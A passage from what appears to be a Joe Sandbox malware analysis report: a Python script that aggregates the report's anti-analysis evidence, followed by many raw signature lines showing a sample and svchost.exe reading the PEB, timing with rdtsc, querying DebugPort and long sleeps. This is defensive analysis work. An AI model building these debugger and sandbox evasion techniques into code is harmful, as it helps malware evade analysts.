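report. Added example, not part of the report or of Joe Sandbox: it parses the
"Source: ..." signature lines in the run-together form of the text export (e.g.
"svchost.exeCode function:") or with a " | " column separator, and aggregates
the evidence behind the sandbox's evasion verdicts."""
import re
from collections import Counter, defaultdict

# Thresholds exactly as the report prints them ("217 > 30", "-434000s >= -30000s").
SLEEP_COUNT_THRESHOLD = 30
SLEEP_TIME_THRESHOLD = 30000

KINDS = ("Code function", "Thread sleep count", "Thread sleep time",
         "Process queried", "Binary or memory string")
RE_LINE = re.compile(r"^Source:\s*(?P<src>.+?)\s*\|?\s*(?P<kind>" +
                     "|".join(re.escape(k) for k in KINDS) + r"):\s*(?P<rest>.*)$")
RE_TID = re.compile(r"^(?P<proc>.+?)\s*TID:\s*(?P<tid>\d+)$")
# Substrings of a "Code function" line that the report treats as anti-analysis evidence.
INDICATORS = ("rdtsc", "fs:[00000030h]", "IsDebuggerPresent", "BlockInput",
              "LdrLoadDll", "GetProcAddress")


def parse_line(line):
    """Return (source, kind, detail) for a signature line, or None for anything else."""
    m = RE_LINE.match(line.strip())
    if not m:
        return None
    # "Jump to behavior" is link text from the HTML report, not evidence.
    return m.group("src"), m.group("kind"), m.group("rest").replace("Jump to behavior", "").strip()


def summarise(lines):
    """Aggregate the evidence of all signature lines into one dict."""
    sleep = {}                        # (process, tid) -> sleep counter snapshot
    indicators = defaultdict(set)     # process -> anti-analysis indicators seen
    peb_reads = Counter()             # process -> number of fs:[30h] reads
    peb_functions = defaultdict(set)  # process -> functions that read the PEB
    vm_strings = Counter()            # dump or dropped file -> strings containing "VMware"
    debugport = set()                 # processes that query ProcessDebugPort
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, kind, detail = parsed
        if kind.startswith("Thread sleep"):
            m = RE_TID.match(src)
            proc, tid = m.groups() if m else (src, "?")
            e = sleep.setdefault((proc, tid), {"count": 0, "time": 0})
            value = abs(int(re.match(r"-?\d+", detail).group()))
            # Assumption: repeated sleep lines for one thread are later snapshots of
            # the same counter, so keep the largest value rather than summing them.
            key = "count" if kind == "Thread sleep count" else "time"
            e[key] = max(e[key], value)
            e["per_call"] = e["time"] // e["count"] if e["count"] else 0
            e["flagged"] = e["count"] > SLEEP_COUNT_THRESHOLD or e["time"] >= SLEEP_TIME_THRESHOLD
        elif kind == "Code function":
            func, _, body = detail.partition(" ")
            indicators[src].update(n for n in INDICATORS if n in body)
            if "fs:[00000030h]" in body:
                # A cleaned report may collapse identical lines into "(N occurrences)".
                occ = [int(n) for n in re.findall(r"\((\d+) occurrences?\)", body)]
                peb_reads[src] += sum(occ) if occ else 1
                peb_functions[src].add(func)
        elif kind == "Process queried" and "DebugPort" in detail:
            debugport.add(src)
        elif kind == "Binary or memory string" and "VMware" in detail:
            vm_strings[src] += 1
    return {"sleep": sleep, "indicators": {k: sorted(v) for k, v in indicators.items()},
            "peb_reads": dict(peb_reads),
            "peb_functions": {k: sorted(v) for k, v in peb_functions.items()},
            "vm_strings": dict(vm_strings), "debugport": sorted(debugport)}


# Sample input: lines copied from this report in the raw text-export form.
SAMPLE_LINES = [
    r"Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128Thread sleep count: 217 > 30Jump to behavior",
    r"Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128Thread sleep time: -434000s >= -30000sJump to behavior",
    r"Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128Thread sleep count: 9756 > 30Jump to behavior",
    r"Source: C:\Windows\SysWOW64\RpcPing.exe TID: 4128Thread sleep time: -19512000s >= -30000sJump to behavior",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E rdtsc 2_2_0327096E",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004175D3 LdrLoadDll,2_2_004175D3",
    r"Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_0045A370 BlockInput,0_2_0045A370",
    r"Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Windows\SysWOW64\RpcPing.exeProcess queried: DebugPortJump to behavior",
    r"Source: C:\Users\user\Desktop\xBzBOQwywT.exeCode function: 0_2_03EC02E0 mov eax, dword ptr fs:[00000030h]0_2_03EC02E0",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]2_2_0322C310",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349",
    r"Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h]2_2_032B2349",
    r"Source: 0J030901P.5.drBinary or memory string: ms.portal.azure.comVMware20,11696494690",
    r"Source: 0J030901P.5.drBinary or memory string: discord.comVMware20,11696494690f",
    r"Source: RpcPing.exe, 00000005.00000002.3361983815.00000000008F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll",
    "Malware Analysis System Evasion",
]

if __name__ == "__main__":
    import pprint
    pprint.pprint(summarise(SAMPLE_LINES))
```

Run against the sample, the RpcPing.exe thread 4128 entry comes out as 9756 sleeps, 19512000 total and 2000 per call, both above the printed thresholds; svchost.exe shows three fs:[30h] reads in two distinct functions plus rdtsc and LdrLoadDll, and the dropped file 0J030901P is the only source with VMware strings. Feeding the whole text export of a report through `summarise` gives the same summary for every process the sandbox observed.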
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_03EC02E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_03EBE148 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_03EBE0E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_03EC1950 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\xBzBOQwywT.exe | Code function: 0_2_03EC18F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03250310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B2349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B035C mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032FA352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D8350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322E388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03228397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032403E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032663FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EC3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A3C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032383C0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B63C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE3DB mov eax, dword ptr fs:[00000030h] (3 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D43D4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03234260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032E0274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B8243 mov eax, dword ptr fs:[00000030h] (1 occurrence); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03236259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EA250 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C62A0 mov eax, dword ptr fs:[00000030h] (5 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0326E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B0283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032402E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323A2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03260124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DE10E mov eax, dword ptr fs:[00000030h] (6 occurrences); mov ecx, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032DA118 mov eax, dword ptr fs:[00000030h] (3 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F0115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C4144 mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C156 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C8158 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03236154 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03270185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032EC188 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D4180 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B019F mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A197 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_033061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F61C3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032AE1D0 mov eax, dword ptr fs:[00000030h] (4 occurrences); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C6030 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B4000 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032D2000 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0324E016 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0325C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03232050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032B6050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032C80A8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032F60B8 mov eax, dword ptr fs:[00000030h] (1 occurrence); mov ecx, dword ptr fs:[00000030h] (1 occurrence)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0323208A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0322A0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_032380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B60E0 mov eax, dword ptr fs:[00000030h]2_2_032B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C0F0 mov eax, dword ptr fs:[00000030h]2_2_0322C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032720F0 mov ecx, dword ptr fs:[00000030h]2_2_032720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B20DE mov eax, dword ptr fs:[00000030h]2_2_032B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C720 mov eax, dword ptr fs:[00000030h]2_2_0326C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov ecx, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326273C mov eax, dword ptr fs:[00000030h]2_2_0326273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AC730 mov eax, dword ptr fs:[00000030h]2_2_032AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C700 mov eax, dword ptr fs:[00000030h]2_2_0326C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230710 mov eax, dword ptr fs:[00000030h]2_2_03230710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03260710 mov eax, dword ptr fs:[00000030h]2_2_03260710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238770 mov eax, dword ptr fs:[00000030h]2_2_03238770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240770 mov eax, dword ptr fs:[00000030h]2_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov esi, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326674D mov eax, dword ptr fs:[00000030h]2_2_0326674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230750 mov eax, dword ptr fs:[00000030h]2_2_03230750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE75D mov eax, dword ptr fs:[00000030h]2_2_032BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272750 mov eax, dword ptr fs:[00000030h]2_2_03272750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B4755 mov eax, dword ptr fs:[00000030h]2_2_032B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032307AF mov eax, dword ptr fs:[00000030h]2_2_032307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E47A0 mov eax, dword ptr fs:[00000030h]2_2_032E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D678E mov eax, dword ptr fs:[00000030h]2_2_032D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032527ED mov eax, dword ptr fs:[00000030h]2_2_032527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE7E1 mov eax, dword ptr fs:[00000030h]2_2_032BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032347FB mov eax, dword ptr fs:[00000030h]2_2_032347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323C7C0 mov eax, dword ptr fs:[00000030h]2_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B07C3 mov eax, dword ptr fs:[00000030h]2_2_032B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324E627 mov eax, dword ptr fs:[00000030h]2_2_0324E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03266620 mov eax, dword ptr fs:[00000030h]2_2_03266620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268620 mov eax, dword ptr fs:[00000030h]2_2_03268620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323262C mov eax, dword ptr fs:[00000030h]2_2_0323262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE609 mov eax, dword ptr fs:[00000030h]2_2_032AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324260B mov eax, dword ptr fs:[00000030h]2_2_0324260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03272619 mov eax, dword ptr fs:[00000030h]2_2_03272619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F866E mov eax, dword ptr fs:[00000030h]2_2_032F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A660 mov eax, dword ptr fs:[00000030h]2_2_0326A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03262674 mov eax, dword ptr fs:[00000030h]2_2_03262674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0324C640 mov eax, dword ptr fs:[00000030h]2_2_0324C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C6A6 mov eax, dword ptr fs:[00000030h]2_2_0326C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032666B0 mov eax, dword ptr fs:[00000030h]2_2_032666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03234690 mov eax, dword ptr fs:[00000030h]2_2_03234690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE6F2 mov eax, dword ptr fs:[00000030h]2_2_032AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B06F1 mov eax, dword ptr fs:[00000030h]2_2_032B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A6C7 mov eax, dword ptr fs:[00000030h]2_2_0326A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240535 mov eax, dword ptr fs:[00000030h]2_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E53E mov eax, dword ptr fs:[00000030h]2_2_0325E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6500 mov eax, dword ptr fs:[00000030h]2_2_032C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
